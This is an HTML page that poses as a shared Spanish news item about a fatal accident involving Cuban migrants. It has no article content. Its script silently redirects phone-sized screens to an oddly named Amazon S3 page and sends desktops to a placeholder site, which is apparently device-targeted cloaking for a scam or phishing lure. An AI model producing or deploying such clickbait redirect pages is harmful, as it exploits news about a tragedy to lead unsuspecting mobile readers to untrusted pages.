<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="2411"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Dramático video: captan un fatal accidente que involucró a migrantes cubanos deja muertos y heridos esta mañana"/>
<meta property="og:image" content="https://content.pancake.vn/1/s1650x900/fwebp/a1/91/46/33/15b083035d5d3f33bc1ce84af8dfe22a7a039fc18333125ca77d1474.png"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
	function generateRandomString(iLen) {
    var sRnd = '';
    var sChrs = "abcdefghiklmnopqrstuvwxyz";
    for (var i = 0; i < iLen; i++) {
      var randomPoz = Math.floor(Math.random() * sChrs.length);
      sRnd += sChrs.substring(randomPoz, randomPoz + 1);
    }
    return sRnd;
  }
        if (screen.width <= 720) {
        window.location = "https://z1nkgkok8113331.s3.eu-west-3.amazonaws.com/zassssssssssss/legfasyyyy.html";
    } else {
        window.location = "https://example.com/default_page.html"
    }
</script>
	
